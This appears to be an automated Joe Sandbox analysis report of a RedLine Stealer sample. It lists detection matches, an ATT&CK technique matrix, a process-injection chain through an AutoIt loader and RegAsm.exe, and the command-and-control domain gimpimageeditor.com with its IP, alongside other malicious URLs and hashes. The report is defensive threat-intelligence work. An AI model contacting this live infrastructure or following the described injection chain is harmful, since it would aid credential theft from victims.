YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00405782
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected RedLine Stealer
              Source: Yara matchFile source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Appartenga.exe.com PID: 6688, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1520, type: MEMORYSTR
              Source: Appartenga.exe.comBinary or memory string: WIN_81
              Source: Appartenga.exe.comBinary or memory string: WIN_XP
              Source: Appartenga.exe.comBinary or memory string: WIN_XPe
              Source: Appartenga.exe.comBinary or memory string: WIN_VISTA
              Source: Appartenga.exe.comBinary or memory string: WIN_7
              Source: Appartenga.exe.comBinary or memory string: WIN_8
              Source: San.adt.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
              Source: Yara matchFile source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Appartenga.exe.com PID: 6688, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1520, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected RedLine Stealer
              Source: Yara matchFile source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Appartenga.exe.com PID: 6688, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1520, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C4696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,6_2_00C4696E
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C46E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00C46E32

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts              		2
              Native API              		1
              DLL Side-Loading              		1
              Exploitation for Privilege Escalation              		11
              Disable or Modify Tools              		121
              Input Capture              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter              		2
              Valid Accounts              		1
              DLL Side-Loading              		11
              Deobfuscate/Decode Files or Information              		LSASS Memory1
              Account Discovery              		Remote Desktop Protocol121
              Input Capture              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
              Valid Accounts              		2
              Obfuscated Files or Information              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
              Access Token Manipulation              		1
              DLL Side-Loading              		NTDS36
              System Information Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
              Process Injection              		1
              Masquerading              		LSA Secrets31
              Security Software Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Valid Accounts              		Cached Domain Credentials2
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Virtualization/Sandbox Evasion              		DCSync2
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
              Access Token Manipulation              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
              Process Injection              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              Remote System Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
              System Network Configuration Discovery              		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1593404 Sample: 2YLM6BQ9S3.exe Startdate: 17/01/2025 Architecture: WINDOWS Score: 100 41 gimpimageeditor.com 2->41 43 FUaPHLaTpAPGRbsfxOMdnwBFBsmro.FUaPHLaTpAPGRbsfxOMdnwBFBsmro 2->43 53 Suricata IDS alerts for network traffic 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 7 other signatures 2->59 11 2YLM6BQ9S3.exe 7 2->11         started        signatures3 process4 signatures5 61 Contains functionality to register a low level keyboard hook 11->61 14 cmd.exe 1 11->14         started        process6 signatures7 63 Obfuscated command line found 14->63 65 Uses ping.exe to sleep 14->65 67 Drops PE files with a suspicious file extension 14->67 69 Uses ping.exe to check the status of other devices and networks 14->69 17 cmd.exe 3 14->17         started        21 conhost.exe 14->21         started        process8 file9 37 C:\Users\user\AppData\...\Appartenga.exe.com, PE32 17->37 dropped 49 Obfuscated command line found 17->49 51 Uses ping.exe to sleep 17->51 23 Appartenga.exe.com 17->23         started        25 PING.EXE 1 17->25         started        28 findstr.exe 1 17->28         started        signatures10 process11 dnsIp12 30 Appartenga.exe.com 1 23->30         started        47 127.0.0.1 unknown unknown 25->47 process13 file14 39 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 30->39 dropped 71 Writes to foreign memory regions 30->71 73 Injects a PE file into a foreign processes 30->73 34 RegAsm.exe 15 2 30->34         started        signatures15 process16 dnsIp17 45 gimpimageeditor.com 76.223.67.189, 49857, 80 AMAZON-02US United States 34->45

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              2YLM6BQ9S3.exe58%ReversingLabsWin32.Trojan.Generic
              2YLM6BQ9S3.exe55%VirustotalBrowse
              2YLM6BQ9S3.exe100%AviraTR/Patched.Gen

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com3%ReversingLabs
              C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://gimpimageeditor.com/100%Avira URL Cloudmalware
              http://gimpimageeditor.com:80/100%Avira URL Cloudmalware
              http://gimpimageeditor.comH0%Avira URL Cloudsafe
              http://gimpimageeditor.com100%Avira URL Cloudmalware
              gimpimageeditor.com:80100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              gimpimageeditor.com
              		76.223.67.189
              		truetrue
                		unknown
                FUaPHLaTpAPGRbsfxOMdnwBFBsmro.FUaPHLaTpAPGRbsfxOMdnwBFBsmro
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  gimpimageeditor.com:80true
                  • Avira URL Cloud: malware
                  		unknown
                  http://gimpimageeditor.com/true
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://gimpimageeditor.comRegAsm.exe, 0000000A.00000002.3268386087.000000000276E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://ipinfo.io/ip%appdata%Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmpfalse
                    		high
                    http://www.autoitscript.com/autoit3/J2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000002.2065078239.0000000000C99000.00000002.00000001.01000000.00000005.sdmp, Appartenga.exe.com, 00000008.00000002.2427249427.0000000000C99000.00000002.00000001.01000000.00000005.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drfalse
                      		high
                      https://sectigo.com/CPS0Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430475744.0000000004264000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2422606312.000000000427D000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430658930.000000000427D000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://ocsp.sectigo.com0Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430475744.0000000004264000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2422606312.000000000427D000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430658930.000000000427D000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://tempuri.org/Endpoint/GetArgumentsRegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://api.ip.sb/geoip%USERPEnvironmentROFILE%Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/soap/envelope/RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3268386087.000000000276E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430475744.0000000004264000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2422606312.000000000427D000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430658930.000000000427D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://gimpimageeditor.comHRegAsm.exe, 0000000A.00000002.3268386087.000000000276E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3268386087.000000000276E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.autoitscript.com/autoit3/2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drfalse
                                            		high
                                            http://tempuri.org/Endpoint/VerifyUpdateResponseRegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://tempuri.org/Endpoint/GetArgumentsLRRegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://tempuri.org/Endpoint/GetArgumentsResponseRegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://tempuri.org/Endpoint/VerifyScanRequestLRRegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://tempuri.org/0tRegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.ipify.orgcookies//settinString.RemovegAppartenga.exe.com, 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2422606312.000000000427D000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430658930.000000000427D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2004/08/addressingRegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yAppartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430475744.0000000004264000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2422606312.000000000427D000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430658930.000000000427D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://tempuri.org/Endpoint/GetUpdatesLRRegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://gimpimageeditor.com:80/RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://tempuri.org/Endpoint/VerifyUpdateLRRegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://tempuri.org/Endpoint/GetUpdatesResponseRegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Endpoint/RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://tempuri.org/Endpoint/GetArgumentsHRegAsm.exe, 0000000A.00000002.3268386087.000000000276E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://tempuri.org/Endpoint/GetArgumentsTRegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/faultHRegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://tempuri.org/Endpoint/VerifyScanRequestResponseRegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/soap/actor/nextRegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                76.223.67.189
                                                                                		gimpimageeditor.comUnited States
                                                                                		16509AMAZON-02UStrue

                                                                                Private

                                                                                IP
                                                                                127.0.0.1

                                                                                General Information

                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                Analysis ID:1593404
                                                                                Start date and time:2025-01-17 06:51:08 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 7m 9s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:12
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:2YLM6BQ9S3.exe
                                                                                renamed because original name is a hash value
                                                                                Original Sample Name:7c86d24bf10f9a6970b3c7c86e455423.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@16/7@2/2
                                                                                EGA Information:
                                                                                • Successful, ratio: 66.7%
                                                                                HCA Information:
                                                                                • Successful, ratio: 99%
                                                                                • Number of executed functions: 97
                                                                                • Number of non-executed functions: 304
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target RegAsm.exe, PID 1520 because it is empty
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                00:53:20API Interceptor122x Sleep call for process: RegAsm.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                76.223.67.189Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                                • www.woodsplace.net/lazq/
                                                                                9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                                • www.infovea.tech/3irn/
                                                                                1162-201.exeGet hashmaliciousFormBookBrowse
                                                                                • www.infovea.tech/s1ai/
                                                                                236236236.elfGet hashmaliciousUnknownBrowse
                                                                                • dubai.degree/
                                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                • www.mjmegartravel.online/t2sm/
                                                                                RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                • www.mjmegartravel.online/t2sm/
                                                                                8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                • qexyhuv.com/login.php
                                                                                7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                • qexyhuv.com/login.php
                                                                                UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                • qexyhuv.com/login.php
                                                                                1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                • qexyhuv.com/login.php

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                gimpimageeditor.com12809F5D40A823049CFB3BDF66332D1929AC49AD7018A.exeGet hashmaliciousRedLineBrowse
                                                                                • 104.21.24.246
                                                                                zIUj0Dor9a.exeGet hashmaliciousRedLineBrowse
                                                                                • 104.21.24.246

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                AMAZON-02USNew order BPD-003777.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.248.169.48
                                                                                https://vertexagent.techGet hashmaliciousUnknownBrowse
                                                                                • 3.5.146.166
                                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                                • 54.171.230.55
                                                                                https://projection13.github.io/sarthak24-amazon-clone/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 3.161.81.121
                                                                                http://staemcommunnuty.com/gift/activation=Dor5Fhnm2wGet hashmaliciousHTMLPhisherBrowse
                                                                                • 18.245.46.22
                                                                                https://raghvendrayadav6997.github.io/Amazon-Clone/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 13.35.58.101
                                                                                QuarantineMessage.zipGet hashmaliciousGabagoolBrowse
                                                                                • 65.9.66.56
                                                                                http://monitor.gaetawindow.com/KL4Qr4780vn131ID883QS381DQ533GD17ES10680Fr92835kb51913eY94206KF83514XE1578052814==Get hashmaliciousPhisherBrowse
                                                                                • 3.128.168.120
                                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                                • 34.249.145.219
                                                                                https://polite-sunburst-c957f8.netlify.appGet hashmaliciousUnknownBrowse
                                                                                • 3.75.10.80

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe8lOT1rXZp5.exeGet hashmaliciousRedLineBrowse
                                                                                  c2.htaGet hashmaliciousXWormBrowse
                                                                                    c2.htaGet hashmaliciousXWormBrowse
                                                                                      OR8Ti8rf8h.exeGet hashmaliciousAveMaria, DcRat, StormKitty, VenomRATBrowse
                                                                                        RFQ-004282A.Teknolojileri A.S.exeGet hashmaliciousAgentTeslaBrowse
